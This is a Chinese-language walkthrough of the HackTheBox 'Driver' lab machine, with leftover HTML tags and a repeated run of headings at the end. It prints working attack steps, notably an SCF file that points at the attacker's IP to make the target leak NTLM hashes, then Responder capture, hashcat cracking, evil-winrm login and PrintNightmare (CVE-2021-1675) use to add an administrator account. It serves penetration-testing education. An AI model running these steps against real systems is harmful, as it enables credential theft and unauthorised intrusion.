HackTheBox: Driver 靶机渗透教学文档<\/h1>

1. 靶机概述<\/h2>

难度等级：HackTheBox官方认定的Easy难度<\/li>
IP地址：10.10.11.106<\/li>
攻击机IP：10.10.16.5 (Kali Linux)<\/li>

主要攻击路径：SMB Share SCF文件攻击 → NTLM哈希捕获 → WinRM登录 → 打印机驱动漏洞提权<\/li> <\/ul>

2. 初始信息收集<\/h2>

2.1 网络配置<\/h3>

确保攻击机与靶机网络连通：<\/p>

ping 10.10.11.106
<\/span><\/span><\/code><\/pre>如果延迟高，可通过代理优化：<\/p>

在OpenVPN配置文件中添加：<\/li>
<\/ul>
socks-proxy 127.0.0.1 1088
或
http-proxy 127.0.0.1 8888
<\/code><\/pre>
2.2 端口扫描<\/h3>
TCP端口扫描<\/strong>：<\/p>
sudo nmap --min-rate 10000<\/span> -p- 10.10.11.106
<\/span><\/span><\/code><\/pre>UDP端口扫描<\/strong>（可选）：<\/p>
sudo nmap -sU --min-rate 10000<\/span> -p- 10.10.11.106
<\/span><\/span><\/code><\/pre>详细服务扫描<\/strong>：<\/p>
sudo nmap -sT -sV -O -p80,135,445,5985 10.10.11.106
<\/span><\/span><\/code><\/pre>漏洞脚本扫描<\/strong>：<\/p>
sudo nmap --script=<\/span>vuln -p80,135,445,5985 10.10.11.106
<\/span><\/span><\/code><\/pre>3. 服务枚举与初始访问<\/h2>
3.1 Web服务(80端口)<\/h3>
发现需要认证的Web界面，尝试弱口令：<\/p>

成功使用 admin:admin<\/code> 登录<\/li>
<\/ul>
3.2 文件上传尝试<\/h3>

尝试上传Web Shell<\/li>
上传显示成功但无法确定路径<\/li>
尝试目录扫描未果<\/li>
尝试SQL注入和命令执行均失败<\/li>
<\/ol>
4. SMB Share - SCF文件攻击<\/h2>
4.1 攻击原理<\/h3>
利用SCF文件强制目标系统向攻击者发送NTLM认证请求，从而捕获哈希值。<\/p>
4.2 实施步骤<\/h3>

创建SCF文件<\/strong>（保存为attack.scf）：<\/li>
<\/ol>
[Shell]
Command=2
IconFile=\\10.10.16.5\L7
[Taskbar]
Command=ToggleDesktop
<\/code><\/pre>

启动Responder监听<\/strong>：<\/li>
<\/ol>
sudo responder -I tun0
<\/span><\/span><\/code><\/pre>

上传SCF文件<\/strong>到目标SMB共享<\/p>
<\/li>

捕获NTLM哈希<\/strong>：<\/p>
<\/li>
<\/ol>

使用hashcat破解捕获的哈希：<\/li>
<\/ul>
hashcat -m 5600<\/span> hash.txt wordlist.txt
<\/span><\/span><\/code><\/pre>
成功破解出密码：liltony<\/code><\/li>
<\/ul>
5. WinRM登录<\/h2>
5.1 初始登录尝试<\/h3>
evil-winrm -i 10.10.11.106 -u tony -p liltony
<\/span><\/span><\/code><\/pre>5.2 常见问题解决<\/h3>
如果遇到SSL相关错误，可能需要修改OpenSSL配置：<\/p>

编辑 \/etc\/ssl\/openssl.cnf<\/code><\/li>
添加或取消注释以下内容：<\/li>
<\/ol>
default_conf

openssl_conf = openssl_init
[openssl_init]
providers = provider_sect
[provider_sect]
default = default_sect
legacy = legacy_sect
[default_sect]
activate = 1
[legacy_sect]
activate = 1
<\/code><\/pre>

如果Ruby版本问题导致evil-winrm无法工作：<\/li>
<\/ol>
# 查看可用Ruby版本<\/span>
<\/span><\/span>apt-cache search ruby | grep 3<\/span>
<\/span><\/span>
<\/span><\/span># 安装新版本<\/span>
<\/span><\/span>sudo apt-get install ruby3.2
<\/span><\/span>
<\/span><\/span># 创建符号链接<\/span>
<\/span><\/span>sudo ln -sf \/usr\/bin\/ruby3.2 \/usr\/bin\/ruby
<\/span><\/span><\/code><\/pre>
终极解决方案：使用干净的Kali环境<\/li>
<\/ol>
6. 权限提升<\/h2>
6.1 信息收集<\/h3>

下载并运行WinPEAS<\/strong>：<\/li>
<\/ol>
wget https:\/\/github.com\/carlospolop\/peass-ng\/releases\/download\/20221006\/winpeasx64.exe
<\/span><\/span>upload \/path\/to\/winpeasx64.exe
<\/span><\/span><\/code><\/pre>
检查PowerShell历史记录<\/strong>：<\/li>
<\/ol>

发现添加了RICOH PCL6打印机驱动程序的记录<\/li>
<\/ul>
6.2 利用打印机驱动漏洞(CVE-2021-1675)<\/h3>

下载漏洞利用脚本<\/strong>：<\/li>
<\/ol>
git clone https:\/\/github.com\/calebstewart\/CVE-2021-1675
<\/span><\/span><\/code><\/pre>
上传并执行<\/strong>：<\/li>
<\/ol>
Import-Module .\cve-2021-1675.ps1
<\/span><\/span>Invoke-Nightmare # 默认添加adm1n\/P@ssw0rd到本地管理员组<\/span>
<\/span><\/span>或<\/span>
<\/span><\/span>Invoke-Nightmare -DriverName "Xerox"<\/span> -NewUser "john"<\/span> -NewPassword "SuperSecure"<\/span>
<\/span><\/span><\/code><\/pre>
使用新创建的管理员账户登录<\/strong>：<\/li>
<\/ol>
evil-winrm -i 10.10.11.106 -u adm1n -p P@ssw0rd
<\/span><\/span><\/code><\/pre>7. 获取Flag<\/h2>

用户Flag：user.txt<\/code><\/li>
系统Flag：root.txt<\/code><\/li>
<\/ul>
8. 总结与学习要点<\/h2>


关键攻击路径<\/strong>：<\/p>

SCF文件攻击获取NTLM哈希<\/li>
WinRM远程管理<\/li>
打印机驱动漏洞提权<\/li>
<\/ul>
<\/li>

技术要点<\/strong>：<\/p>

SMB共享的安全风险<\/li>
NTLM认证的脆弱性<\/li>
Windows打印机驱动漏洞利用<\/li>
渗透测试中的环境问题解决<\/li>
<\/ul>
<\/li>

参考资源<\/strong>：<\/p>

CVE-2021-1675漏洞利用：https:\/\/github.com\/calebstewart\/CVE-2021-1675<\/li>
WinPEAS：https:\/\/github.com\/carlospolop\/peass-ng<\/li>
Evil-WinRM：https:\/\/github.com\/Hackplayers\/evil-winrm<\/li>
<\/ul>
<\/li>
<\/ol>

HackTheBox: Driver 靶机渗透教学文档<\/h1>

2. 初始信息收集<\/h2>

3. 服务枚举与初始访问<\/h2>

4. SMB Share - SCF文件攻击<\/h2>

4.1 攻击原理<\/h3> 利用SCF文件强制目标系统向攻击者发送NTLM认证请求，从而捕获哈希值。<\/p>

5. WinRM登录<\/h2>

6. 权限提升<\/h2>

4.1 攻击原理<\/h3>
利用SCF文件强制目标系统向攻击者发送NTLM认证请求，从而捕获哈希值。<\/p>